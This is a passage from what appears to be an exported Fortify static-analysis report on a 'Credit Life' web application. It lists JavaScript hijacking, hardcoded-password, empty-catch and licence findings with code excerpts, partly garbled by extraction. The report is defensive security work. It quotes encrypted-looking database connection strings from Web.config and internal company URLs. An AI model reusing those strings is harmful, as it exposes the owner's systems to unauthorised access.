(".sidebar-search").submit()}),0!==$(".sidebar-search").size()&&($(".sidebar-
search .input-group").on("click",function(e){e.stopPropagation()}),$
Oct 5, 2018, 5:40 PM 100

("body").on("click",function(){$(".sidebar-search").hasClass("open")&&$
(".sidebar-search").removeClass("open")}))},l=function(){$(".page-
header").on("click",".search-form",function(e){$(this).addClass("open"),$
(this).find(".form-control").focus(),$(".page-header .search-form .form-
control").on("blur",function(e){$(this).closest(".search-
form").removeClass("open"),$(this).unbind("blur")})}),$(".page-
header").on("keypress",".hor-menu .search-form .form-control",function(e)
{return 13==e.which?($(this).closest(".search-form").submit(),!1):void 0}),$
(".page-header").on("mousedown",".search-form.open .submit",function(e)
{e.preventDefault(),e.stopPropagation(),$(this).closest(".search-
form").submit()})},c=function(){var e=300,a=500;navigator.userAgent.match(/
iPhone|iPad|iPod/i)?$(window).bind("touchend touchcancel
touchleave",function(s){$(this).scrollTop()>e?$(".scroll-to-top").fadeIn(a):$
(".scroll-to-top").fadeOut(a)}):$(window).scroll(function(){$
(this).scrollTop()>e?$(".scroll-to-top").fadeIn(a):$(".scroll-to-
top").fadeOut(a)}),$(".scroll-to-top").click(function(e){return
e.preventDefault(),$("html, body").animate({scrollTop:0},a),!
{r(),o(),d(),App.isAngularJsApp()&&t("match"),App.addResizeHandler(r)},initContent:fun
{this.initHeader(),this.initSidebar(),this.initContent(),this.initFooter()},fixContent
{r()},getLayoutImgPath:function(){return App.getAssetsPath()
+e},getLayoutCssPath:function(){return App.getAssetsPath()+a}}}
();App.isAngularJsApp()===!1&&jQuery(document).ready(function()
{Layout.init()});
2
3 undefined
4 undefined
5 undefined
6 undefined
7 undefined
Sink Details
Sink: ajax(0)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/layouts/layout4/scripts/layout.min.js:1
css/",s=App.getResponsiveBreakpoint("md"),i=function(){var e,a=$(".page-content"),i=$(".page-
sidebar"),t=$("body");if(t.hasClass("page-footer-fixed")===!0&&t.hasClass("page-sidebar-
fixed")===!1){var o=App.getViewPort().height-$(".page-footer").outerHeight(!0)-$(".page-
else{if(t.hasClass("page-sidebar-fixed"))e=n()-10,t.hasClass("page-footer-fixed")===!1&&(e-=$
(".page-footer").outerHeight(!0));else{var r=$(".page-header").outerHeight(!0),p=$(".page-
footer").outerHeight(!0);e=App.getViewPort().width<s?App.getViewPort().height-r-
Oct 5, 2018, 5:40 PM 101

p:i.height()-10,e+r+p<=App.getViewPort().height&&(e=App.getViewPort().height-r-p-45)}
a.attr("style","min-height:"+e+"px")}},t=function(e,a){var i=location.hash.toLowerCase(),t=$
(".page-sidebar-menu");if("click"===e||"set"===e?a=$(a):"match"===e&&t.find("li >
=a.size()&&"javascript:;"!==a.attr("href").toLowerCase()&&"#"!==a.attr("href").toLowerCase())
{parseInt(t.data("slide-speed")),t.data("keep-expanded");t.hasClass("page-sidebar-menu-hover-
submenu")===!1?t.find("li.nav-item.open").each(function(){var e=!1;$
(this).find("li").each(function(){return $(this).find(" > a").attr("href")===a.attr("href")?
void(e=!0):void 0}),e!==!0&&($(this).removeClass("open"),$(this).find("> a
menu").slideUp())}):t.find("li.open").removeClass("open"),t.find("li.active").removeClass("active"),t.fin
> a > .selected").remove(),a.parents("li").each(function(){$(this).addClass("active"),$
(this).find("> a > span.arrow").addClass("open"),1===$(this).parent("ul.page-sidebar-
menu").size()&&$(this).find("> a").append('<span class="selected"></span>'),1===$
(this).children("ul.sub-menu").size()&&$
sidebar").hasClass("in")&&$(".page-header .responsive-toggler").click()}},o=function(){$
(".page-sidebar").on("click","li > a",function(e){if(!(App.getViewPort().width>=s&&1===$
(this).parents(".page-sidebar-menu-hover-submenu").size())){if($(this).next().hasClass("sub-
menu")===!1)return void(App.getViewPort().width<s&&$(".page-sidebar").hasClass("in")&&$(".page-
header .responsive-toggler").click());var a=$(this).parent().parent(),t=$(this),o=$(".page-
sidebar-menu"),n=$(this).next(),r=o.data("auto-scroll"),p=parseInt(o.data("slide-
0&&(a.children("li.open").children("a").children(".arrow").removeClass("open"),a.children("li.open").chil
menu:not(.always-open)").slideUp(p),a.children("li.open").removeClass("open"));var
(this).parent().removeClass("open"),n.slideUp(p,function(){r===!0&&$("body").hasClass("page-
sidebar-closed")===!1&&($("body").hasClass("page-sidebar-fixed")?
o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})):($(".arrow",$
(this)).addClass("open"),$(this).parent().addClass("open"),n.slideDown(p,function(){r===!0&&$
("body").hasClass("page-sidebar-closed")===!1&&($("body").hasClass("page-sidebar-fixed")?
o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})),e.preventDefault()}}),App.isAngularJs
$(".page-sidebar-menu li > a").on("click",function(e){App.getViewPort().width<s&&$
(this).next().hasClass("sub-menu")===!1&&$(".page-header .responsive-toggler").click()}),$
(".page-sidebar").on("click"," li > a.ajaxify",function(e)
{e.preventDefault(),App.scrollTop();var a=$(this).attr("href"),i=$(".page-sidebar ul"),t=($
(".page-content"),$(".page-content .page-content-
body"));i.children("li.active").removeClass("active"),i.children("arrow.open").removeClass("open"),
$(this).parents("li").each(function(){$(this).addClass("active"),$(this).children("a >
span.arrow").addClass("open")}),$
toggler").click(),App.startPageLoading();var o=$(this);$.ajax({type:"GET",cache:!
1,url:a,dataType:"html",success:function(e){0===o.parents("li.open").size()&&$(".page-sidebar-
menu > li.open >
a").click(),App.stopPageLoading(),t.html(e),Layout.fixContentHeight(),App.initAjax()},error:function(e,a,
{App.stopPageLoading(),t.html("<h4>Could not load the requested content.</h4>")}})}),$(".page-
content").on("click",".ajaxify",function(e){e.preventDefault(),App.scrollTop();var a=$
(this).attr("href"),i=($(".page-content"),$(".page-content .page-content-
body"));App.startPageLoading(),App.getViewPort().width<s&&$(".page-sidebar").hasClass("in")&&$
(".page-header .responsive-toggler").click(),$.ajax({type:"GET",cache:!
1,url:a,dataType:"html",success:function(e)
{App.stopPageLoading(),i.html(e),Layout.fixContentHeight(),App.initAjax()},error:function(e,a,s)
{i.html("<h4>Could not load the requested content.</h4>"),App.stopPageLoading()}})}),$
(document).on("click",".page-header-fixed-mobile .responsive-toggler",function()
{App.scrollTop()})},n=function(){var e=App.getViewPort().height-$(".page-header").outerHeight(!
0)-40;return $("body").hasClass("page-footer-fixed")&&(e-=$(".page-
Oct 5, 2018, 5:40 PM 102

height",n()),App.initSlimScroll(e),i()))},p=function(){var e=$("body");e.hasClass("page-
sidebar-fixed")&&$(".page-sidebar").on("mouseenter",function(){e.hasClass("page-sidebar-
closed")&&$(this).find(".page-sidebar-menu").removeClass("page-sidebar-menu-
closed")}).on("mouseleave",function(){e.hasClass("page-sidebar-closed")&&$(this).find(".page-
sidebar-menu").addClass("page-sidebar-menu-closed")})},d=function(){var e=$("body");
$.cookie&&"1"===$.cookie("sidebar_closed")&&App.getViewPort().width>=s&&($
("body").addClass("page-sidebar-closed"),$(".page-sidebar-menu").addClass("page-sidebar-menu-
closed")),$("body").on("click",".sidebar-toggler",function(a){var s=$(".page-sidebar"),i=$
(".page-sidebar-menu");$(".sidebar-search",s).removeClass("open"),e.hasClass("page-sidebar-
closed")?(e.removeClass("page-sidebar-closed"),i.removeClass("page-sidebar-menu-closed"),
$.cookie&&$.cookie("sidebar_closed","0")):(e.addClass("page-sidebar-closed"),i.addClass("page-
sidebar-menu-closed"),e.hasClass("page-sidebar-fixed")&&i.trigger("mouseleave"),$.cookie&&
$.cookie("sidebar_closed","1")),$(window).trigger("resize")}),p(),$(".page-
sidebar").on("click",".sidebar-search .remove",function(e){e.preventDefault(),$(".sidebar-
search").removeClass("open")}),$(".page-sidebar .sidebar-search").on("keypress","input.form-
control",function(e){return 13==e.which?($(".sidebar-search").submit(),!1):void 0}),$
(".sidebar-search .submit").on("click",function(e){e.preventDefault(),$("body").hasClass("page-
sidebar-closed")&&$(".sidebar-search").hasClass("open")===!1?(1===$(".page-sidebar-
fixed").size()&&$(".page-sidebar .sidebar-toggler").click(),$(".sidebar-
search").addClass("open")):$(".sidebar-search").submit()}),0!==$(".sidebar-search").size()&&($
(".sidebar-search .input-group").on("click",function(e){e.stopPropagation()}),$
("body").on("click",function(){$(".sidebar-search").hasClass("open")&&$(".sidebar-
search").removeClass("open")}))},l=function(){$(".page-header").on("click",".search-
form",function(e){$(this).addClass("open"),$(this).find(".form-control").focus(),$(".page-
header .search-form .form-control").on("blur",function(e){$(this).closest(".search-
form").removeClass("open"),$(this).unbind("blur")})}),$(".page-header").on("keypress",".hor-
menu .search-form .form-control",function(e){return 13==e.which?($(this).closest(".search-
form").submit(),!1):void 0}),$(".page-header").on("mousedown",".search-
form.open .submit",function(e){e.preventDefault(),e.stopPropagation(),$(this).closest(".search-
form").submit()})},c=function(){var e=300,a=500;navigator.userAgent.match(/iPhone|iPad|iPod/i)?
$(window).bind("touchend touchcancel touchleave",function(s){$(this).scrollTop()>e?$(".scroll-
to-top").fadeIn(a):$(".scroll-to-top").fadeOut(a)}):$(window).scroll(function(){$
(this).scrollTop()>e?$(".scroll-to-top").fadeIn(a):$(".scroll-to-top").fadeOut(a)}),$(".scroll-
to-top").click(function(e){return e.preventDefault(),$("html, body").animate({scrollTop:0},a),!
{r(),o(),d(),App.isAngularJsApp()&&t("match"),App.addResizeHandler(r)},initContent:function()
{this.initHeader(),this.initSidebar(),this.initContent(),this.initFooter()},fixContentHeight:function()
{r()},getLayoutImgPath:function(){return App.getAssetsPath()+e},getLayoutCssPath:function()
{return App.getAssetsPath()+a}}}();App.isAngularJsApp()===!1&&jQuery(document).ready(function()
{Layout.init()});
2
3 undefined
4 undefined
5 undefined
6 undefined
7 undefined
Oct 5, 2018, 5:40 PM 103

Low
regmcu.js, line 50 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/modules/js/regmcu.js:50
Taint Flags:

Low
QuestionRelation.js, line 9 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/modules/js/QuestionRelation.js:9
Taint Flags:
6
7 if (dID != "") {
8 var url = $("#getSubQuestionUrl").val();
9 $.getJSON(url, { questionid: dID },
11 var select = $("#sub_question_id");
12 select.empty();
Oct 5, 2018, 5:40 PM 104

20181005_CLS.CLS.obj.Release.Package.PackageTmp.assets.modules.js
PackageTmp/assets/modules/js/regmcu.js, line 50 (JavaScript Hijacking: Low
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/PackageTmp/assets/modules/js/
regmcu.js:50
Taint Flags:

Content/Scripts/jquery-1.10.2-vsdoc.js, line 468 (JavaScript Hijacking: Vulnerable Low
Framework)
Issue Details
Source Details
Source: Read type
From: _evalUrl
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/packages/jQuery.1.10.2/Conte
nt/Scripts/jquery-1.10.2-vsdoc.js:470
467
468 return jQuery.ajax({
469 url: url,
470 type: "GET",
471 dataType: "script",
472 async: false,
473 global: false,
Oct 5, 2018, 5:40 PM 105

Content/Scripts/jquery-1.10.2-vsdoc.js, line 468 (JavaScript Hijacking: Vulnerable Low
Framework)
Sink Details
Sink: ajax()
Enclosing Method: _evalUrl()
468
465 };
466 jQuery._evalUrl = function( url ) {
467
468 return jQuery.ajax({
469 url: url,
470 type: "GET",
471 dataType: "script",

Content/Scripts/jquery-1.10.2-vsdoc.js, line 1854 (JavaScript Hijacking: Low
Issue Details
Sink Details
Enclosing Method: getScript()
1854
Taint Flags:
1852 /// </param>
1853
1854 return jQuery.get( url, undefined, callback, "script" );
1855 };
1856 jQuery.globalEval = function( data ) {
1857 /// <summary>

Issue Details
Oct 5, 2018, 5:40 PM 106

Sink Details
Enclosing Method: getJSON()
1841
Taint Flags:
1839 /// </param>
1840
1841 return jQuery.get( url, data, callback, "json" );
1842 };
1843 jQuery.getScript = function( url, callback ) {
1844 /// <summary>
Oct 5, 2018, 5:40 PM 107

Password Management: Password in Comment (2 issues)
Abstract
Storing passwords or password details in plaintext anywhere in the system or system code may
compromise system security in a way that cannot be easily remedied.
Explanation
It is never a good idea to hardcode a password. Storing password details within comments is equivalent to
hardcoding passwords. Not only does it allow all of the project's developers to view the password, it also
makes fixing the problem extremely difficult. Once the code is in production, the password is now leaked to
the outside world and cannot be protected or changed without patching the software. If the account
protected by the password is compromised, the owners of the system will be forced to choose between
security and availability.
Example: The following comment specifies the default password to connect to a database:
...
// Default username for database connection is "scott"
// Default password for database connection is "tiger"
...
This code will run successfully, but anyone who has access to it will have access to the password. Once
the program has shipped, there is likely no way to change the database user "scott" with a password of
"tiger" unless the program is patched. An employee with access to this information could use it to break into
the system.
Recommendation
Passwords should never be hardcoded and should generally be obfuscated and managed in an external
source. Storing passwords in plaintext anywhere on the system allows anyone with sufficient permissions
to read and potentially misuse the password.
Issue Summary
Oct 5, 2018, 5:40 PM 108

Engine Breakdown
Password Management: Password in Comment 2 0 0 2
Total 2 0 0 2
Password Management: Password in Comment Low

Low
app.js, line 515 (Password Management: Password in Comment)
Issue Details
Sink Details
Sink: Comment
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/scripts/app.js:515
Taint Flags:
512 // Fix input placeholder issue for IE8 and IE9
513 var handleFixInputPlaceholderForIE = function() {
514 //fix html5 placeholder attribute for ie7 & ie8
515 if (isIE8 || isIE9) { // ie8 & ie9
516 // this is html5 placeholder fix for inputs, inputs with placeholder-no-fix class will be
skipped(e.g: we need this for password fields)
517 $('input[placeholder]:not(.placeholder-no-fix), textarea[placeholder]:not(.placeholder-no-
fix)').each(function() {
518 var input = $(this);
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.packages.jQuery.1.10.2.Tools

Tools/jquery-1.10.2.intellisense.js, line 2042 (Password Management: Password Low
in Comment)
Issue Details
Sink Details
Sink: Comment
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/packages/jQuery.1.10.2/Tools/jquery-1.10.2.intellisense.js:
2042
Taint Flags:
2039 /// <returns type="jQuery" />
2040 /// </signature>
2041 },
2042 'password': function() {
2043 /// <summary>Selects all elements of type password.</summary>
2044 },
Oct 5, 2018, 5:40 PM 109

Password Management: Password in Comment Low
Tools/jquery-1.10.2.intellisense.js, line 2042 (Password Management: Password Low
in Comment)
2045 'position': function() {
Oct 5, 2018, 5:40 PM 110

Password Management: Password in Configuration File (4 issues)
Abstract
Storing a plaintext password in a configuration file could result in a system compromise.
Explanation
Storing a plaintext password in a configuration file allows anyone who can read the file access to the
password-protected resource. Developers sometimes believe that they cannot defend the application from
someone who has access to the configuration, but this attitude makes an attacker's job easier. Good
password management guidelines require that a password never be stored in plaintext.
Recommendation
A password should never be stored in plaintext. Instead, the password should be entered by an
administrator when the system starts. If that approach is impractical, a less secure but often adequate
solution is to obfuscate the password and scatter the de-obfuscation material around the system so that an
attacker has to obtain and correctly combine multiple system resources to decipher the password.
Microsoft(R) provides a tool that can be used in conjunction with the Windows Data Protection application
programming interface (DPAPI) to protect sensitive application entries in configuration files [1].
Issue Summary
Engine Breakdown
Password Management: Password in Configuration 4 0 0 4
File
Total 4 0 0 4
Password Management: Password in Configuration File High

High
(Password Management: Password in Configuration File)
Issue Details
Oct 5, 2018, 5:40 PM 111

High
(Password Management: Password in Configuration File)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Web.config:12
Taint Flags:
9 </configSections>
10 <connectionStrings>
11 
12 <add name="CLSConnection" connectionString="SA394s7WzOjyM/CMsB7BY59zlVOpHiwn4Vfny0s
+Qr4LZ87NHyoZZCpevEcKRn1NnRew9DiFAVsotG8ld7k+bUHrpoyDMWysd/8fhvkjAlePS4PWDMtgSbj09+aPF
+wqJjHosADPe2rwPNntKVWVUg==" providerName="System.Data.SqlClient"/>
13 <add name="AMCConnection" connectionString="yr1zGB/
XYT0XWPNJZZImrWgC3k9ZfpCqMc7xOb1NcDIUbHVeJhmhb5IELJJ6XLeUDuMUb23eGu8lvClIEgz58KE/MsG8T/
Y0PQ8Ec01yMW1AU/81zWjLh8Owyadu2z5+RyuQNWJgtsoAHMdEvCC2j/ThcRdcIpiVepILjHgustc="
providerName="System.Data.SqlClient"/>
14 </connectionStrings>
15 <appSettings>
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.bin

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/bin/CLS.dll.config, line
High
12 (Password Management: Password in Configuration File)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/bin/CLS.dll.config:12
Taint Flags:
9 </configSections>
15 <appSettings>
Oct 5, 2018, 5:40 PM 112

20181005_CLS.CLS.obj.Release.TransformWebConfig.original
TransformWebConfig/original/Web.config, line 12 (Password Management: High
Password in Configuration File)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/TransformWebConfig/original/Web.config:12
Taint Flags:
9 </configSections>
15 <appSettings>

20181005_CLS.CLS.obj.Release.TransformWebConfig.transformed
TransformWebConfig/transformed/Web.config, line 12 (Password Management: High
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/TransformWebConfig/transformed/
Web.config:12
Taint Flags:
9 </configSections>
+wqJjHosADPe2rwPNntKVWVUg==" providerName="System.Data.SqlClient" />
Oct 5, 2018, 5:40 PM 113

20181005_CLS.CLS.obj.Release.TransformWebConfig.transformed
TransformWebConfig/transformed/Web.config, line 12 (Password Management: High
providerName="System.Data.SqlClient" />
15 <appSettings>
Oct 5, 2018, 5:40 PM 114

Poor Error Handling: Empty Catch Block (4 issues)
Abstract
Ignoring an exception can cause the program to overlook unexpected states and conditions.
Explanation
Just about every serious attack on a software system begins with the violation of a programmer's
assumptions. After the attack, the programmer's assumptions seem flimsy and poorly founded, but before
an attack many programmers would defend their assumptions well past the end of their lunch break.
Two dubious assumptions that are easy to spot in code are "this method call can never fail" and "it doesn't
matter if this call fails". When programmers ignore exceptions, they implicitly state that they are operating
under one of these assumptions.
Example 1: The following code excerpt ignores a rarely-thrown exception from DoExchange().
try {
DoExchange();
}
catch (RareException e) {
// this can never happen
}
If a RareException were to ever be thrown, the program would continue to execute as though nothing
unusual had occurred. The program records no evidence indicating the special situation, potentially
frustrating any later attempt to explain the program's behavior.
Recommendation
At a minimum, log the fact that the exception was thrown so that it will be possible to come back later and
make sense of the resulting program behavior. Better yet, abort the current operation.
Example 2: The code in Example 1 could be rewritten in the following way:
try {
DoExchange();
}
catch (RareException e) {
Log.Error("This can never happen: " + e);
}
Issue Summary
Oct 5, 2018, 5:40 PM 115

Engine Breakdown
Poor Error Handling: Empty Catch Block 4 0 0 4
Total 4 0 0 4
Poor Error Handling: Empty Catch Block Low

Package: CLS.Utils
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Utils/AES.cs, line 22
Low
(Poor Error Handling: Empty Catch Block)
Issue Details
Kingdom: Errors
Sink Details
Sink: CatchBlock
Enclosing Method: Encrypt()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Utils/AES.cs:22
Taint Flags:
19 {
20 encData = EncryptStringToBytes_Aes(data, keys[0], keys[1]);
21 }
22 catch (CryptographicException) { }
23 catch (ArgumentNullException) { }
24
25 return encData;

Low
Issue Details
Kingdom: Errors
Sink Details
Sink: CatchBlock
Enclosing Method: Encrypt()
Oct 5, 2018, 5:40 PM 116

Package: CLS.Utils
(Poor Error Handling: Empty Catch Block) Low

Taint Flags:
20 encData = EncryptStringToBytes_Aes(data, keys[0], keys[1]);
21 }
24
25 return encData;
26 }

Low
Issue Details
Kingdom: Errors
Sink Details
Sink: CatchBlock
Enclosing Method: Decrypt()
Taint Flags:
34 {
35 decData = DecryptStringFromBytes_Aes(data, keys[0], keys[1]);
36 }
39
40 return decData;

Low
Issue Details
Kingdom: Errors
Sink Details
Sink: CatchBlock
Enclosing Method: Decrypt()
Taint Flags:
35 decData = DecryptStringFromBytes_Aes(data, keys[0], keys[1]);
36 }
Oct 5, 2018, 5:40 PM 117

Package: CLS.Utils
(Poor Error Handling: Empty Catch Block) Low
39
40 return decData;
41 }
Oct 5, 2018, 5:40 PM 118

Potentially Banned License: Creative Commons (1 issue)
Abstract
Not all FOSS licenses are acceptable for use at CIGNA or in CIGNA projects, of the variety of licenses
used by free and open source software many either constrain usage or impose requirements that are not
conducive to CIGNA policies and business practices.
Explanation
Some licenses are approved for use at CIGNA, however software using them must be requested via the
Open Source Software Working Group (OS-WG). The OS-WG will check for legal approval as well as more
general suitability for use at CIGNA.
Recommendation
This software may already be on the list of globally approved software at http://confluence.sys.cigna.com/
confluence/download/attachments/28312609/ComponentsByApplicationOrUseCategory.pdf
-- however if it is not you must request it by following the Request process (see: http://
confluence.sys.cigna.com/confluence/display/EATechArch/Open+Source+FAQ#OpenSourceFAQ-
HowdoIrequestopensourcesoftware%3F )
International users, please contact your local Fortify lead.
Issue Summary
Engine Breakdown
Potentially Banned License: Creative Commons 1 0 0 1
Total 1 0 0 1
Potentially Banned License: Creative Commons High

datatables/datatables.js, line 26144 (Potentially Banned License: Creative High
Commons)
Issue Details
Oct 5, 2018, 5:40 PM 119

Potentially Banned License: Creative Commons High
datatables/datatables.js, line 26144 (Potentially Banned License: Creative High
Commons)
Kingdom: Unknown - Custom Issue

Sink Details
Sink: Comment
Taint Flags:
26141
26142 /* jslint node: true */
26143 'use strict';
26144 /*jshint -W004 */
26145 /* qr.js -- QR code generator in Javascript (revision 2011-01-19)
26146 * Written by Kang Seonghoon <public+qrjs@mearie.org>.
26147 *
Oct 5, 2018, 5:40 PM 120

Potentially Banned License: GPL (8 issues)
Abstract
Not all FOSS licenses are acceptable for use at CIGNA or in CIGNA projects, of the variety of licenses
used by free and open source software many either constrain usage or impose requirements that are not
conducive to CIGNA policies and business practices.
Explanation
Some licenses are approved for use at CIGNA, however software using them must be requested via the
Open Source Software Working Group (OS-WG). The OS-WG will check for legal approval as well as more
general suitability for use at CIGNA.
Recommendation
This software may already be on the list of globally approved software at http://confluence.sys.cigna.com/
confluence/download/attachments/28312609/ComponentsByApplicationOrUseCategory.pdf
-- however if it is not you must request it by following the Request process (see: http://
confluence.sys.cigna.com/confluence/display/EATechArch/Open+Source+FAQ#OpenSourceFAQ-
HowdoIrequestopensourcesoftware%3F )
International users, please contact your local Fortify lead.
Issue Summary
Engine Breakdown
Potentially Banned License: GPL 8 0 0 8
Total 8 0 0 8
Potentially Banned License: GPL High

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.apps.scripts
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/apps/scripts/
High
jquery.numeric_input.min.js, line 0 (Potentially Banned License: GPL)
Issue Details
Oct 5, 2018, 5:40 PM 121

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.apps.scripts
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/apps/scripts/
High
jquery.numeric_input.min.js, line 0 (Potentially Banned License: GPL)
Sink Details
Sink: Comment
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/apps/scripts/jquery.numeric_input.min.js:0
Taint Flags:
1 /*
2 * jQuery Numeric Input - v0.1.3 - 2013-08-27
3 * https://github.com/manuelvanrijn/jquery-numeric_input
4 * Copyright (c) 2013 Manuel van Rijn
5 * Licensed MIT, GPL
6 */
7 (function(e,t,n,r){var i=function(t,n){this.elem=t,this.
$elem=e(t),this.options=n};i.prototype={init:function(){var
t=this;t.options=e.extend({},e.fn.numeric_input.defaults,t.options),t.
$elem.keypress(function(e){t.preventDefaultForKeyCode(e.which)===!0&&e.preventDefault();var
n=t.getNewValueForKeyCode(e.which,t.$elem.val());n!==!1&&t.
$elem.val(n)}),t.options.parseOnBlur===!0&&t.$elem.blur(function(e){var n=t.parseValue(t.
$elem.val());t.$elem.val(n)});if(t.options.initialParse===!0){var n=t.parseValue(t.
$elem.val());t.$elem.val(n)}return t},preventDefaultForKeyCode:function(e)
{if(e>=48&&e<=57)return!1;switch(e){case 0:case 8:case 9:case 35:case 36:case 37:case 39:case
144:return!1;default:return!0}},getNewValueForKeyCode:function(t,n){if(t===44||t===46||
t===188||t===190)if(n.indexOf(this.options.decimal)===-1)return
e.trim(n)===""&&this.options.leadingZeroCheck&&(n="0"),n+this.options.decimal;return
t===45&&this.options.allowNegative&&n.charAt(0)!=="-"?"-"+n:!1},parseValue:function(e){var t=!
1,n=e.replace(/[A-Za-z$]/g,"");n.indexOf("-")!==-1&&(n=n.replace("-",""),t=!
0);if(n.indexOf(".")!==-1||n.indexOf(",")!
==-1)n=n.replace(".",this.options.decimal),n=n.replace(",",this.options.decimal);return
n.indexOf(this.options.decimal)===0&&(n="0"+n),t===!0&&this.options.allowNegative===!
0&&(n="-"+n),n}},e.fn.numeric_input=function(t){return this.each(function()
{e.data(this,"numeric_input")||e.data(this,"numeric_input",(new
i(this,t)).init())})},e.fn.numeric_input.defaults={decimal:",",leadingZeroCheck:!
0,initialParse:!0,parseOnBlur:!0,allowNegative:!1}})(jQuery,window,document);

High
jquery.blockui.min.js, line 2 (Potentially Banned License: GPL)
Issue Details
Sink Details
Sink: Comment
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/jquery.blockui.min.js:2
Taint Flags:
1 /*!
2 * jQuery blockUI plugin
Oct 5, 2018, 5:40 PM 122

High
jquery.blockui.min.js, line 2 (Potentially Banned License: GPL)
3 * Version 2.70.0-2014.11.23
4 * Requires jQuery v1.7 or later
5 *
6 * Examples at: http://malsup.com/jquery/block/
7 * Copyright (c) 2007-2013 M. Alsup

High
respond.min.js, line 4 (Potentially Banned License: GPL)
Issue Details
Sink Details
Sink: Comment
Taint Flags:
1 /*! matchMedia() polyfill - Test a CSS media type/query in JS. Authors & copyright (c) 2012:
Scott Jehl, Paul Irish, Nicholas Zakas. Dual MIT/BSD license */
2 /*! NOTE: If you're already including a window.matchMedia polyfill via Modernizr or
otherwise, you don't need this part */
(document);
4
j.mp/respondjs */
Oct 5, 2018, 5:40 PM 123

respond.min.js, line 4 (Potentially Banned License: GPL) High
7

High
datatables/datatables.js, line 12 (Potentially Banned License: GPL)
Issue Details
Sink Details
Sink: Comment
Taint Flags:
9 * Included libraries:
10 * JSZip 2.5.0, pdfmake 0.1.18, DataTables 1.10.10, AutoFill 2.1.0, Buttons 1.1.0, Column
visibility 1.1.0, Flash export 1.1.0, HTML5 export 1.1.0, Print view 1.1.0, ColReorder 1.3.0,
FixedColumns 3.2.0, FixedHeader 3.1.0, Responsive 2.0.0, RowReorder 1.1.0, Scroller 1.4.0,
Select 1.1.0
11 */
12
13 /*!
14
15 JSZip - A Javascript class for generating and reading zip files

High
datatables/datatables.min.js, line 14 (Potentially Banned License: GPL)
Issue Details
Oct 5, 2018, 5:40 PM 124

datatables/datatables.min.js, line 14 (Potentially Banned License: GPL) High

Sink Details
Sink: Comment
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/datatables/datatables.min.js:14
Taint Flags:
11 */
12
13 /*!
14
15 JSZip - A Javascript class for generating and reading zip files
16 <http://stuartk.com/jszip>
17

20181005_CLS.CLS.obj.Release.Package.PackageTmp.assets.apps.scripts
PackageTmp/assets/apps/scripts/jquery.numeric_input.min.js, line 1 (Potentially High
Banned License: GPL)
Issue Details
Sink Details
Sink: Comment
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/PackageTmp/assets/apps/scripts/
jquery.numeric_input.min.js:1
Taint Flags:
1 /*
2 * jQuery Numeric Input - v0.1.3 - 2013-08-27
3 * https://github.com/manuelvanrijn/jquery-numeric_input
4 * Copyright (c) 2013 Manuel van Rijn
5 * Licensed MIT, GPL
6 */
7 (function(e,t,n,r){var i=function(t,n){this.elem=t,this.
$elem=e(t),this.options=n};i.prototype={init:function(){var
t=this;t.options=e.extend({},e.fn.numeric_input.defaults,t.options),t.
$elem.keypress(function(e){t.preventDefaultForKeyCode(e.which)===!0&&e.preventDefault();var
n=t.getNewValueForKeyCode(e.which,t.$elem.val());n!==!1&&t.
$elem.val(n)}),t.options.parseOnBlur===!0&&t.$elem.blur(function(e){var n=t.parseValue(t.
$elem.val());t.$elem.val(n)});if(t.options.initialParse===!0){var n=t.parseValue(t.
$elem.val());t.$elem.val(n)}return t},preventDefaultForKeyCode:function(e)
{if(e>=48&&e<=57)return!1;switch(e){case 0:case 8:case 9:case 35:case 36:case 37:case 39:case
144:return!1;default:return!0}},getNewValueForKeyCode:function(t,n){if(t===44||t===46||
Oct 5, 2018, 5:40 PM 125

20181005_CLS.CLS.obj.Release.Package.PackageTmp.assets.apps.scripts
PackageTmp/assets/apps/scripts/jquery.numeric_input.min.js, line 1 (Potentially High
Banned License: GPL)
t===188||t===190)if(n.indexOf(this.options.decimal)===-1)return
e.trim(n)===""&&this.options.leadingZeroCheck&&(n="0"),n+this.options.decimal;return
t===45&&this.options.allowNegative&&n.charAt(0)!=="-"?"-"+n:!1},parseValue:function(e){var t=!
1,n=e.replace(/[A-Za-z$]/g,"");n.indexOf("-")!==-1&&(n=n.replace("-",""),t=!
0);if(n.indexOf(".")!==-1||n.indexOf(",")!
==-1)n=n.replace(".",this.options.decimal),n=n.replace(",",this.options.decimal);return
n.indexOf(this.options.decimal)===0&&(n="0"+n),t===!0&&this.options.allowNegative===!
0&&(n="-"+n),n}},e.fn.numeric_input=function(t){return this.each(function()
{e.data(this,"numeric_input")||e.data(this,"numeric_input",(new
